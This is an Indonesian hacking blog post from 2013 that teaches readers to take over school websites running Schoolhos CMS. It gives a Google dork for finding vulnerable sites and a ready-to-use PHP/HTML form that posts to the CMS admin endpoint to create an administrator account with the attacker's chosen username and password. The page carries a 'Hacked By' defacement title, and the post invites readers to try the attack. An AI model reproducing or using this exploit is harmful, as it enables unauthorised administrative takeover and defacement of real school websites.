Exploit ini sangat mudah digunakan :) saya dapat dari Blognya bang denny katanya "Exploit favorit saya nomor 1 ini mah =)" << kalau menurut Bang Denny lho :D ok langsung saja di coba ya ?
Google Dork: inurl:/?p=bukutamu intext:Schoolhos Free Open Source CMS<?php
$self = $_SERVER["PHP_SELF"];
echo 'Target';
echo "<form action=\"$self\" method=\"GET\"><input type=\"text\" name=\"url\"><input type=\"submit\"></form>";
if(!isset($_GET['url'])){
$url = "http://target.com/adminpanel/database/admin.php";
}else
{
$url = $_GET['url'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Hacked By : VeRZaW#021</title>
</head>
<body>
<h1>Hacked By : VeRZaW#021</h1>
<?php echo "Target is : $url"; ?>
<form id="target" method="post" action="<?php echo "$url"; ?>/adminpanel/aplikasi/database/admin.php?pilih=admin&untukdi=tambah">
Isi username yang mau di isi <INPUT type="text" name="username" value="veriztiarta"><br>
Pass nya<INPUT type="text" name="password" value="kampret123><br>
<input type="submit" name="insert" value="Insert" >
</form>
</body>
</html>
Contoh gambar seperti itu ! :D
Teks yang berwarna merah : Jangan ganti Title ya =) hormati yang buat ;) Teks yang berwarna Biru : ganti User & Pass nya dengan user&pass kamu :)
Anda baru saja membaca artikel yang berkategori Hacking
dengan judul Tutorial Hack Situs Sekolah CMS Schoolhos - CSRF Admin !. Anda bisa bookmark halaman ini dengan URL http://predator-technology.blogspot.com/2013/08/tutorial-hack-situs-sekolah-via-cms-new.html. Terima kasih!
Ditulis oleh:
VeRZaW#021 - 2 August 2013
Belum ada komentar untuk "Tutorial Hack Situs Sekolah CMS Schoolhos - CSRF Admin !"
Post a Comment
Mohon Memberi Komentar dengan Kata-Kata yang Sopan !!